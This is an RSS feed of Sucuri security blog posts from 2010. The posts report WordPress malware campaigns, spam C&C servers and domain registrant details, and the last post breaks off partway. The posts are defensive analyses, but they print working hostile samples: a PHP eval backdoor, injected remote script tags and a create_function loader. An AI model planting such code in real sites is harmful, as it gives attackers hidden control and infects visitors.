<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">

<channel>
	<title>Sucuri</title>
	
	<link>http://blog.sucuri.net</link>
	<description>Protect Your Interwebs</description>
	<lastBuildDate>Thu, 02 Sep 2010 21:07:17 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/SucuriSecurity" /><feedburner:info uri="sucurisecurity" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><item>
		<title>Malware update – Alex Bodrov – awaue.com,etc</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurity/~3/3tiws9LQMFw/malware-update-alex-bodrov-awaue-cometc.html</link>
		<comments>http://blog.sucuri.net/2010/08/malware-update-alex-bodrov-awaue-cometc.html#comments</comments>
		<pubDate>Tue, 31 Aug 2010 15:15:24 +0000</pubDate>
		<dc:creator>dd</dc:creator>
				<category><![CDATA[malware]]></category>
		<category><![CDATA[malware_updates]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=805</guid>
		<description><![CDATA[We will be posting some quick malware updates on our blog from now on. The latest one that is affecting quite a few sites are malicious javascripts being injected directly into the wp-posts table on WordPress sites. Those are the &#8230; <a href="http://blog.sucuri.net/2010/08/malware-update-alex-bodrov-awaue-cometc.html">Read more</a>]]></description>
			<content:encoded><![CDATA[<p>We will be posting some quick malware updates on our blog from now on. The latest one that is affecting quite a few sites are malicious javascripts being injected directly into the wp-posts table on WordPress sites. Those are the domains being used:</p>
<blockquote>
<p>http://aeaaea.com/ou</p>
<p>http://secree.com/re</p>
<p>http://uoauer.com/si</p>
<p>http://oeooea.com/ve</p>
<p>http://secowo.com/wo</p>
</blockquote>
<p>Those were used in the first batch of attacks that happened a few weeks (months) ago:</p>
<blockquote>
<p>http://ae.awaue.com</p>
<p>http://ie.eracou.com</p>
<p>http://ao.euuaw.com</p>
</blockquote>
<p>Details about the malware:<br />
<a href="http://sucuri.net/malware/entry/MW:RKS:3">http://sucuri.net/malware/entry/MW:RKS:3</a></p>
<p>For hosting providers/security companies:<strong> Block the IP address 91.188.59.203</strong> &#8211; (it is hosting all those sites).<br />
<span id="more-805"></span><br />
Whois details:</p>
<blockquote><p>
Name: Alex Bodrov<br />
Address: Polubotka 19-10<br />
City: Chernigov<br />
Province/state: Chernigov region<br />
Country: UA<br />
Postal Code: 34586<br />
Phone: +48.7139123463<br />
Fax: +48.7139123463<br />
Email: alexbodrovqw@gmail.com<br />
<br />
Name: Alexandr Borisenko<br />
Address: Polubotka 81-38<br />
City: kiev<br />
Province/state: Kiev region<br />
Country: UA<br />
Postal Code: 45675<br />
Email: 3807345466632@gmail.com
</p></blockquote>
<p>We will post more details as we learn them.</p>
<hr />
<p>If your site is hacked and you need help, visit <a href="http://sucuri.net/">http://sucuri.net</a> to learn about our malware removal and monitoring plans.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/z9dZ2X4jPKG1fU2GkbcjuNgYahc/0/da"><img src="http://feedads.g.doubleclick.net/~a/z9dZ2X4jPKG1fU2GkbcjuNgYahc/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/z9dZ2X4jPKG1fU2GkbcjuNgYahc/1/da"><img src="http://feedads.g.doubleclick.net/~a/z9dZ2X4jPKG1fU2GkbcjuNgYahc/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/SucuriSecurity/~4/3tiws9LQMFw" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2010/08/malware-update-alex-bodrov-awaue-cometc.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		<feedburner:origLink>http://blog.sucuri.net/2010/08/malware-update-alex-bodrov-awaue-cometc.html</feedburner:origLink></item>
		<item>
		<title>Hilary Kneber (part XI) – sippa.dottasink.net</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurity/~3/w6d4SO-x3ZE/hilary-kneber-part-xi-sippa-dottasink-net.html</link>
		<comments>http://blog.sucuri.net/2010/08/hilary-kneber-part-xi-sippa-dottasink-net.html#comments</comments>
		<pubDate>Tue, 24 Aug 2010 03:30:46 +0000</pubDate>
		<dc:creator>dd</dc:creator>
				<category><![CDATA[hacked]]></category>
		<category><![CDATA[malware]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=796</guid>
		<description><![CDATA[Hilary Kneber (hilarykneber@yahoo.com) is at it again. We&#8217;ve been detecting various sites infected with a malicious javascript pointing to http://sippa.dottasink.net: &#60; script src = &#34;http://sippa.dottasink.net/music/indi.php&#8221;&#62;&#60;/script&#62; This redirects any visitor of the hacked site to http:// www3.pc-cleaner40. co.cc, where the famous &#8230; <a href="http://blog.sucuri.net/2010/08/hilary-kneber-part-xi-sippa-dottasink-net.html">Read more</a>]]></description>
			<content:encoded><![CDATA[<p>Hilary Kneber (hilarykneber@yahoo.com) is at it again. We&#8217;ve been detecting various sites infected with a malicious javascript pointing to http://sippa.dottasink.net:</p>
<blockquote><p>
&lt; script src = &quot;http://sippa.dottasink.net/music/indi.php&#8221;&gt;&lt;/script&gt;
</p></blockquote>
<p>This redirects any visitor of the hacked site to http:// www3.pc-cleaner40. co.cc, where the famous &#8220;fake AV&#8221; virus will be offered to him.</p>
<p>And guess who registered that domain?<br />
<span id="more-796"></span></p>
<blockquote><p>
$ whois dottasink.net<br />
..<br />
Registrant Contact:<br />
   HardSoft, inc<br />
   Hilary Kneber hilarykneber@yahoo.com<br />
   7569468 fax: 7569468<br />
   29/2 Sun street. Montey 29<br />
   Virginia NA 3947<br />
   us</p>
<p>Administrative Contact:<br />
   Hilary Kneber hilarykneber@yahoo.com<br />
   7569468 fax: 7569468<br />
   29/2 Sun street. Montey 29<br />
   Virginia NA 3947<br />
   us
</p></blockquote>
<p>Yes, the same group behind <strong><a href="http://blog.sucuri.net/2010/08/yet-another-series-of-attacks-part-x-vancouvererrorsonfile-com-and-the-hilarykneber-group.html">&#8220;vancouvererrorsonfile</a></strong>, <strong><a href="http://blog.sucuri.net/2010/07/yet-another-series-of-attacks-this-time-using-whereisdudescars-com.html">whereisdudescars</a></strong> and various other attacks (losotrana.com, zettapetta.com, etc).</p>
<p>Note that this domain is not currently blacklisted (and the site is up), so be careful when clicking those links. So far, we are seeing this spread through all sorts of shared servers, but it seems to be too early to tell how many sites are affected.</p>
<hr />
<p>If your site is hacked, this script should clean it up: <a href="http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html">wordpress-fix.php</a> or contact us for a <a href="http://sucuri.net">professional, hands on clean-up</a> (support@sucuri.net).</p>

<p><a href="http://feedads.g.doubleclick.net/~a/nr-pvmlAQDZfUJIzY7k0HWNTMfo/0/da"><img src="http://feedads.g.doubleclick.net/~a/nr-pvmlAQDZfUJIzY7k0HWNTMfo/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/nr-pvmlAQDZfUJIzY7k0HWNTMfo/1/da"><img src="http://feedads.g.doubleclick.net/~a/nr-pvmlAQDZfUJIzY7k0HWNTMfo/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/SucuriSecurity/~4/w6d4SO-x3ZE" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2010/08/hilary-kneber-part-xi-sippa-dottasink-net.html/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		<feedburner:origLink>http://blog.sucuri.net/2010/08/hilary-kneber-part-xi-sippa-dottasink-net.html</feedburner:origLink></item>
		<item>
		<title>More spam: Google-traffic-analytics.com C&amp;C server</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurity/~3/Qp7xAMYRqpo/more-spam-google-traffic-analytics-com-cc-server.html</link>
		<comments>http://blog.sucuri.net/2010/08/more-spam-google-traffic-analytics-com-cc-server.html#comments</comments>
		<pubDate>Mon, 23 Aug 2010 17:27:10 +0000</pubDate>
		<dc:creator>dd</dc:creator>
				<category><![CDATA[hacked]]></category>
		<category><![CDATA[pharma]]></category>
		<category><![CDATA[spam]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=682</guid>
		<description><![CDATA[We have been tracking another wave of SPAM that is affecting many popular web sites. What is interesting is all of them have been controlled by just one site: http://www.google-traffic-analytics.com. And when this site went down, guess what is showing &#8230; <a href="http://blog.sucuri.net/2010/08/more-spam-google-traffic-analytics-com-cc-server.html">Read more</a>]]></description>
			<content:encoded><![CDATA[<p><a href="http://sucuri.net">We</a> have been tracking another wave of SPAM that is affecting many popular web sites. What is interesting is all of them have been controlled by just one site: <b>http://www.google-traffic-analytics.com</b>. </p>
<p>And when this site went down, guess what is showing up on Google:<br />
<a href="http://3.bp.blogspot.com/_w4XYN7NmRts/THKq1TFxG9I/AAAAAAAAAJo/GYnOfZA72Hs/s1600/Picture+12.png" rel="lightbox'><img alt="Google list of Sites with spam" src="http://3.bp.blogspot.com/_w4XYN7NmRts/THKq1TFxG9I/AAAAAAAAAJo/GYnOfZA72Hs/s1600/Picture+12.png" title="Google list of Sites with spam" class="alignnone" width="706" height="788" /></a><br />
<span id="more-682"></span><br />
Yes, that&#8217;s around 202k different pages that have been hacked and are showing up those results. When the Google-traffic-analytics.com was up, instead of that error it would spill SPAM to search engines (5 mg  tadalafil, viagra, etc).</p>
<p>Just some of the affected sites:</p>
<blockquote><p>
www.archaeological.org (Archaeological Institute of America)<br />
www.energycenter.org (Center for sustainable Energy)<br />
www.ieta.org (International Emissions trading association)<br />
www.efpa-italia.org (European Financial planning association)<br />
www.memes.org<br />
www.ancbs.org<br />
www.grains.org<br />
summits.aberdeen.com<br />
www.scbar.org<br />
www.stpsb.org<br />
teamfocususa.org<br />
www.npg.org.uk<br />
www.brooklynwaldorf.org<br />
www.pcs.org<br />
www.nyew.org<br />
www.vrwa.org<br />
www.ior-institute.org<br />
summits.aberdeen.com<br />
www.greenway.org<br />
www.oldlife.org
</p></blockquote>
<p>Finding them on Google is pretty simple as well: <i>inurl:.org &#8221; 5mg tadalafil&#8221;</i> or you can also search for: <i>&#8220;http://www.google-traffic-analytics.com&#8221; &#8220;Warning: file_get_contents&#8221;</i> which is what happens when you try to access a hacked site and the google-traffic-analytics site is offline.</p>
<p>As far as cleaning up an affected site, it looks like the attackers added a base64 encoded eval inside the index.php file to load http://www.google-traffic-analytics.com and present the SPAM if the request came from a search engine. Cleaning that up should be enough to remove the spam/error itself, but you still have to find the root cause that allowed your site to get hacked.</p>
<p>We will post more details when we have them.</p>
<hr />
<p>Need help with a hacked site? Check out <a href="http://sucuri.net">http://sucuri.net</a> for a complete malware removal and site monitoring solution.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/9Wj3Yg1LcQwYr7_Lz1ATVVXGBBg/0/da"><img src="http://feedads.g.doubleclick.net/~a/9Wj3Yg1LcQwYr7_Lz1ATVVXGBBg/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/9Wj3Yg1LcQwYr7_Lz1ATVVXGBBg/1/da"><img src="http://feedads.g.doubleclick.net/~a/9Wj3Yg1LcQwYr7_Lz1ATVVXGBBg/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/SucuriSecurity/~4/Qp7xAMYRqpo" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2010/08/more-spam-google-traffic-analytics-com-cc-server.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://blog.sucuri.net/2010/08/more-spam-google-traffic-analytics-com-cc-server.html</feedburner:origLink></item>
		<item>
		<title>Gmail blacklisted by Spamhaus</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurity/~3/8iWja2K0lrs/gmail-blacklisted-by-spamhaus.html</link>
		<comments>http://blog.sucuri.net/2010/08/gmail-blacklisted-by-spamhaus.html#comments</comments>
		<pubDate>Thu, 19 Aug 2010 16:01:21 +0000</pubDate>
		<dc:creator>dd</dc:creator>
				<category><![CDATA[blacklisted]]></category>
		<category><![CDATA[gmail]]></category>
		<category><![CDATA[spam]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=769</guid>
		<description><![CDATA[Update: Gmail not blacklisted anymore. It seems that today Spamhaus (a widely used Spam blacklist) started to blacklist the IP addresses used by gmail. We got this notification via our blacklist monitor: &#60; OK: Host www.gmail.com clean. &#8212; &#62; WARN: &#8230; <a href="http://blog.sucuri.net/2010/08/gmail-blacklisted-by-spamhaus.html">Read more</a>]]></description>
			<content:encoded><![CDATA[<p><b>Update: Gmail not blacklisted anymore.</b></p>
<p>It seems that today <a href="http://www.spamhaus.org">Spamhaus</a> (a widely used Spam blacklist) started to blacklist the IP addresses used by gmail. We got this notification via our <a href="http://sucuri.net">blacklist monitor</a>:</p>
<blockquote><p>
&lt;    OK: Host www.gmail.com clean.<br />
&#8212;<br />
&gt;    WARN: http://www.spamhaus.org/query/bl?ip=74.125.227.21<br />
&gt;    WARN: Host www.gmail.com blacklisted.
</p></blockquote>
<p>Digging further:</p>
<blockquote><p>
$ host gmail.com<br />
gmail.com has address 74.125.227.24<br />
gmail.com has address 74.125.227.21<br />
gmail.com has address 74.125.227.22<br />
gmail.com has address 74.125.227.23
</p></blockquote>
<p><span id="more-769"></span><br />
Querying Spamhaus, we find:</p>
<blockquote><p>
<strong>74.125.227.21 is listed in the SBL</strong>, in the following records:<br />
<strong>74.125.227.22 is listed in the SBL</strong>, in the following records:<br />
<strong>74.125.227.23 is listed in the SBL</strong>, in the following records:<br />
<strong>74.125.227.24 is listed in the SBL</strong>, in the following records:
</p></blockquote>
<p>Here is the probable reason they were blocked:</p>
<blockquote><p>
<strong>Spam Operation: Canadian Pharmacy</strong><br />
74.125.227.0/24 is listed on the SBL as being assigned to, being under the control of, or being otherwise connected with a known spam operation listed on the ROKSO database as: Canadian Pharmacy
</p></blockquote>
<p>Looking for more details, it seems that spammers were using docs.google.com to post some documents, which are stored in the same /24 as gmail. Spamhaus decided to blacklist the whole subnet. Details:</p>
<blockquote><p>
writely.l.google.com<br />
Address: 74.125.227.1 &#8211; 74.125.227.15</p>
<p>Please stop supporting spammers.</p>
<p>You can start by removing the following.</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</p>
<p>http://docs.google.com/document/edit?id=1-ZumxEpeOxw2kcoZZUtuF_8pu0lQl5xkS8aV_dRN00c</p>
<p>http://docs.google.com/document/edit?id=10S8bRb38l1Ew8d_KVH3b2O46PPhRXYp4uv3gyNJICQs</p>
<p>http://docs.google.com/document/edit?id=10zmjlIiu_b-gzxBipgl8R2asyLYLLkj0OnzhEFALcW0</p>
</blockquote>
<p>Details can be verified here: <a href="http://www.spamhaus.org/query/bl?ip=74.125.227.21">http://www.spamhaus.org/query/bl?ip=74.125.227.21</a> and <a href="http://www.spamhaus.org/sbl/sbl.lasso?query=SBL95011">here</a>.</p>
<hr />
<p>Check out <a href="http://sucuri.net">Sucuri Security</a> for a professional blacklist, Whois and malware monitoring solution. </p>

<p><a href="http://feedads.g.doubleclick.net/~a/TCyFYQGDhjcU4Pith154U3Ifm1E/0/da"><img src="http://feedads.g.doubleclick.net/~a/TCyFYQGDhjcU4Pith154U3Ifm1E/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/TCyFYQGDhjcU4Pith154U3Ifm1E/1/da"><img src="http://feedads.g.doubleclick.net/~a/TCyFYQGDhjcU4Pith154U3Ifm1E/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/SucuriSecurity/~4/8iWja2K0lrs" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2010/08/gmail-blacklisted-by-spamhaus.html/feed</wfw:commentRss>
		<slash:comments>16</slash:comments>
		<feedburner:origLink>http://blog.sucuri.net/2010/08/gmail-blacklisted-by-spamhaus.html</feedburner:origLink></item>
		<item>
		<title>Pharma hack and their C&amp;C (Command &amp; control) server</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurity/~3/QK4lTr8Gtzk/pharma-hack-and-their-cc-command-control-server.html</link>
		<comments>http://blog.sucuri.net/2010/08/pharma-hack-and-their-cc-command-control-server.html#comments</comments>
		<pubDate>Thu, 12 Aug 2010 20:34:34 +0000</pubDate>
		<dc:creator>dd</dc:creator>
				<category><![CDATA[hacked]]></category>
		<category><![CDATA[pharma]]></category>
		<category><![CDATA[spam]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=743</guid>
		<description><![CDATA[A large portion of the sites Sucuri has been fixing in recent weeks are stemming from infections caused by the infamous Pharma Hack. We posted a detailed document explaining how to fix it and clean the attack: Understanding and cleaning &#8230; <a href="http://blog.sucuri.net/2010/08/pharma-hack-and-their-cc-command-control-server.html">Read more</a>]]></description>
			<content:encoded><![CDATA[<p>A large portion of the sites <a href="http://sucuri.net">Sucuri</a> has been fixing in recent weeks are stemming from infections caused by the infamous Pharma Hack. We posted a detailed document explaining how to fix it and clean the attack:</p>
<p><a href="http://blog.sucuri.net/2010/07/understanding-and-cleaning-the-pharma-hack-on-wordpress.html">Understanding and cleaning the pharma hack on WordPress</a></p>
<p>One thing we&#8217;ve noticed on all sites affected so far is that all of them have been receiving commands from this IP address:  <strong>94.76.241.4</strong> (curingin.com).</p>
<p>If your site has been affected you can double check your access.log for these entries:</p>
<blockquote><p>
94.76.241.4 &#8211; - [31/Jul/2010:06:07:59 -0700] &#8220;POST /wp-content/themes/classic/sidebar.php HTTP/1.1&#8243; 500 374 &#8220;-&#8221; &#8220;-&#8221;<br />
94.76.241.4 &#8211; - [31/Jul/2010:06:08:30 -0700] &#8220;POST /wp-content/themes/classic/sidebar.php HTTP/1.1&#8243; 500 447 &#8220;-&#8221; &#8220;-&#8221;<br />
94.76.241.4 &#8211; - [31/Jul/2010:11:06:55 -0700] &#8220;POST /wp-content/themes/classic/sidebar.php HTTP/1.1&#8243; 500 444 &#8220;-&#8221; &#8220;-&#8221;<br />
94.76.241.4 &#8211; - [30/Jul/2010:12:57:41 -0700] &#8220;POST /wp-content/themes/classic/comments.php HTTP/1.1&#8243; 200 202 &#8220;-&#8221; &#8220;-&#8221;
</p></blockquote>
<p>This IP is hosted at <strong>Blueconnex</strong> and even after tons of abuse reports (from multiple sources), the&#8217;ve sat idle.</p>
<blockquote><p>
$ whois 94.76.241.4<br />
route:          94.76.192.0/18<br />
descr:          Blueconnex Networks Ltd<br />
origin:         AS29550
</p></blockquote>
<p><span id="more-743"></span></p>
<blockquote><p>
$ whois curingin.com<br />
Registrant:<br />
    Icarus Kann Team<br />
    Icarus Kann        (ikaruskann@ymail.com)<br />
    Potokaki<br />
    Elounda<br />
    Samos,81300<br />
    GR<br />
    Tel. +210.9882728
</p></blockquote>
<p>Requests from the IP address try to access a backdoor they&#8217;ve inserted inside the /themes directory (generally sidebar.php, comments.php, 404.php, etc). This is what the backdoor looks like (all in one line):</p>
<blockquote><p>
&lt; ?php $a = &#8216;m&#8217;.'d5&#8242;;<br />
if($a($_REQUEST[$a])==&#8217;698357e86842&#8242;.&#8217;1222bcf89349bd5cf34d&#8217;)<br />
   {$w = &#8216;Cdbl0sYoWOiyJt3qtqyOoqxA&#8217;;$x = $_REQUEST[$w];<br />
   $y = &#8216;base&#8217;.&#8217;6&#8242;;$y.= &#8217;4_d&#8217;.'ecode&#8217;;$x = $y($x);$z = &#8216;creat&#8217;.'e_f&#8217;;<br />
   $z.= &#8216;unction&#8217;;$x = $z(&#8221;,$x);$x();} ?&gt;
</p></blockquote>
<p><strong>If your site is hacked and it keeps getting reinfected, look for this backdoor.</strong></p>
<p>Once that file is called, it re-uploads another script into the /plugins directory and inserts new entries in the DB. Our friend <a href="http://andrewloe.com">W. Andrew Loe III</a> did a good analysis of this attack and found how it works in detail (he was able to decode all the files in his honeypot).</p>
<p>That&#8217;s the first file the attackers uploaded to hack everything:<br />
<a href="http://sucuri.net/?page=tools&#038;title=blacklist&#038;detail=7b1341a148b1d8a205587218f66ef912">http://sucuri.net/?page=tools&#038;title=blacklist&#038;detail=7b1341a148b1d8a205587218f66ef912</a></p>
<p>You see that it reads wp-config.php, creates a new plugin and activates it. This is the file added to the plugins:<br />
<a href="http://sucuri.net/?page=tools&#038;title=blacklist&#038;detail=a9663c48164df1fcc59253aed5a0defc">http://sucuri.net/?page=tools&#038;title=blacklist&#038;detail=a9663c48164df1fcc59253aed5a0defc</a></p>
<p>This one is executed as well:<br />
<a href="http://sucuri.net/?page=tools&#038;title=blacklist&#038;detail=eb5db5a81632a089fd07fa259c0448a6">http://sucuri.net/?page=tools&#038;title=blacklist&#038;detail=eb5db5a81632a089fd07fa259c0448a6</a></p>
<p>So a very interesting and complex attack they&#8217;ve managed to pull off. Many sites are still infected, so they probably have a large number of sites under their control. </p>
<hr />
<p>If your site is infected and you need help, <a href="http://sucuri.net">contact us</a>.  We&#8217;ll get your site cleaned up and malware-free right away.</p>
<p>Protect your interwebs!</p>

<p><a href="http://feedads.g.doubleclick.net/~a/rTskSnoyVinGz0XxNYt_6pWvkE4/0/da"><img src="http://feedads.g.doubleclick.net/~a/rTskSnoyVinGz0XxNYt_6pWvkE4/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/rTskSnoyVinGz0XxNYt_6pWvkE4/1/da"><img src="http://feedads.g.doubleclick.net/~a/rTskSnoyVinGz0XxNYt_6pWvkE4/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/SucuriSecurity/~4/QK4lTr8Gtzk" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2010/08/pharma-hack-and-their-cc-command-control-server.html/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		<feedburner:origLink>http://blog.sucuri.net/2010/08/pharma-hack-and-their-cc-command-control-server.html</feedburner:origLink></item>
		<item>
		<title>Yet another series of attacks (part X) – vancouvererrorsonfile.com and the hilarykneber group</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurity/~3/5h0dcZleXyo/yet-another-series-of-attacks-part-x-vancouvererrorsonfile-com-and-the-hilarykneber-group.html</link>
		<comments>http://blog.sucuri.net/2010/08/yet-another-series-of-attacks-part-x-vancouvererrorsonfile-com-and-the-hilarykneber-group.html#comments</comments>
		<pubDate>Thu, 05 Aug 2010 04:57:05 +0000</pubDate>
		<dc:creator>dd</dc:creator>
				<category><![CDATA[bluehost]]></category>
		<category><![CDATA[hacked]]></category>
		<category><![CDATA[malware]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=732</guid>
		<description><![CDATA[If you have been following our blog long, you probably heard about quite a few large scale attacks affecting many hosting companies: GoDaddy, Bluehost, Dreamhost, etc, etc. The new one that started to spread today uses a javascript file pointing &#8230; <a href="http://blog.sucuri.net/2010/08/yet-another-series-of-attacks-part-x-vancouvererrorsonfile-com-and-the-hilarykneber-group.html">Read more</a>]]></description>
			<content:encoded><![CDATA[<p>If you have been following our blog long, you probably heard about quite a few large scale attacks affecting many hosting companies: GoDaddy, Bluehost, Dreamhost, etc, etc.</p>
<p>The new one that started to spread today uses a javascript file pointing to http://vancouvererrorsonfile.com/js2.php. When called, it will load www4.meowmeow4.co.cc and then offer the famous &#8220;fake AV&#8221; virus to the end user of a site. That&#8217;s how it looks like in a site:</p>
<blockquote><p>
&lt; script src =&quot; http://vancouvererrorsonfile.com/js2.php
</p></blockquote>
<p>Or in our <a href="http://sucuri.net">scanner</a> (<a href="http://sucuri.net/malware/entry/MW:BLUEH:2">blueh2</a>):<br />
<span id="more-732"></span><br />
<a href="http://1.bp.blogspot.com/_w4XYN7NmRts/TFpA2uUqonI/AAAAAAAAAJQ/-lqkJ-7QDhw/s1600/Picture+9.png"><img alt="" src="http://1.bp.blogspot.com/_w4XYN7NmRts/TFpA2uUqonI/AAAAAAAAAJQ/-lqkJ-7QDhw/s1600/Picture+9.png" title="malware" class="alignnone" width="616" height="31" /></a></p>
<p>Note that this domain is not currently blacklisted (and the site is up), so be careful when clicking those links. So far, we are seeing this spread only on Bluehost and Dreamhost, but it seems to be too early to tell how many sites are affected.</p>
<p><b>If your site is hacked, this script should clean it up: <a href="http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html">virus-fix.php</a> or contact us for a <a href="http://sucuri.net">professional help</a> (support@sucuri.net).</b></p>
<p>However, what is interesting is the people behind this attack (and all others). Those domains are always registered by:</p>
<blockquote><p>
   Hilary Kneber hilarykneber@yahoo.com<br />
   7569468 fax: 7569468<br />
   29/2 Sun street. Montey 29<br />
   Virginia NA 3947<br />
   us
</p></blockquote>
<p>You can check all the big ones that affected a large number of sites:</p>
<blockquote><p>
whereisdudescars.com<br />
domainameat.cc<br />
cloudisthebestnow.com<br />
losotrana.com<br />
indesignstudioinfo.com<br />
zettapetta.com
</p></blockquote>
<p>All by the same group and all of them using the same tactics. We should start monitoring registrations using this domain and block them automatically.</p>
<p>We will post more details as we learn about it.</p>

<p><a href="http://feedads.g.doubleclick.net/~a/TP95k8fJGuAlKmJf1zlksDtnj6c/0/da"><img src="http://feedads.g.doubleclick.net/~a/TP95k8fJGuAlKmJf1zlksDtnj6c/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/TP95k8fJGuAlKmJf1zlksDtnj6c/1/da"><img src="http://feedads.g.doubleclick.net/~a/TP95k8fJGuAlKmJf1zlksDtnj6c/1/di" border="0" ismap="true"></img></a></p><img src="http://feeds.feedburner.com/~r/SucuriSecurity/~4/5h0dcZleXyo" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2010/08/yet-another-series-of-attacks-part-x-vancouvererrorsonfile-com-and-the-hilarykneber-group.html/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		<feedburner:origLink>http://blog.sucuri.net/2010/08/yet-another-series-of-attacks-part-x-vancouvererrorsonfile-com-and-the-hilarykneber-group.html</feedburner:origLink></item>
		<item>
		<title>Cleaning the “siteurlpath” hack on WordPress (wplinksforwork and hemoviestube spam bots)</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurity/~3/0XlCRQWiwZQ/cleaning-the-siteurlpath-hack-on-wordpress-wplinksforwork-and-hemoviestube-spam-bots.html</link>
		<comments>http://blog.sucuri.net/2010/08/cleaning-the-siteurlpath-hack-on-wordpress-wplinksforwork-and-hemoviestube-spam-bots.html#comments</comments>
		<pubDate>Wed, 04 Aug 2010 19:10:55 +0000</pubDate>
		<dc:creator>dd</dc:creator>
				<category><![CDATA[hacked]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[spam]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=706</guid>
		<description><![CDATA[Recently we started to see a lot of WordPress sites hacked with malware hidden inside the wp_options -> siteurlpath table. The symptoms are very similar to the pharma hack (lots of SPAM hidden in the site), but in this case &#8230; <a href="http://blog.sucuri.net/2010/08/cleaning-the-siteurlpath-hack-on-wordpress-wplinksforwork-and-hemoviestube-spam-bots.html">Read more</a>]]></description>
			<content:encoded><![CDATA[<p>Recently we started to see a lot of WordPress sites hacked with malware hidden inside the wp_options -> siteurlpath table. The symptoms are very similar to the <a href="http://blog.sucuri.net/2010/07/understanding-and-cleaning-the-pharma-hack-on-wordpress.html">pharma hack</a> (lots of SPAM hidden in the site), but in this case the SPAM is displayed to all users, not only search engines.</p>
<p>This is how an affected site looks like on our <a href="http://sucuri.net">scanner</a>:</p>
<p><a href="http://1.bp.blogspot.com/_w4XYN7NmRts/TFm5GmcP9FI/AAAAAAAAAJI/3EFL2OKLNE0/s1600/Picture+8.png" rel="lightbox"><img alt="" src="http://1.bp.blogspot.com/_w4XYN7NmRts/TFm5GmcP9FI/AAAAAAAAAJI/3EFL2OKLNE0/s1600/Picture+8.png" title="Site hacked with spam" width="714" height="377" /></a><br />
<span id="more-706"></span><br />
Plus, all the sites infected receive &#8220;orders&#8221; (the spam links to display) from two sites: http://wplinksforwork.com and http://hemoviestube.com. Details about it later.</p>
<p>To get started cleaning your site, you first have to make sure WordPress is updated. If it is not, go ahead and <a href="http://codex.wordpress.org/Updating_WordPress">update it</a> before doing anything else.</p>
<h2>Cleaning up the file system</h2>
<p>The first place you have to clean is the file system. On all the sites we&#8217;ve cleaned so far, the malware was hidden in three files: header.php, functions.php and a random image file (void.jpg, test.jpg, lol.jpg, etc). All of them are inside your themes directory.</p>
<p>Inside the header.php, they added the following code:</p>
<blockquote><p>
$wp__theme_icon=create_function(&#8221;,file_get_contents(&#8216;/path/wp-content/themes/themename/images/void.jpg&#8217;));$wp__theme_icon(); ?>
</p></blockquote>
<p>So it basically read the contents of void.jpg (which is not an image in reality, but a heavily encoded php backdoor):</p>
<blockquote><p>
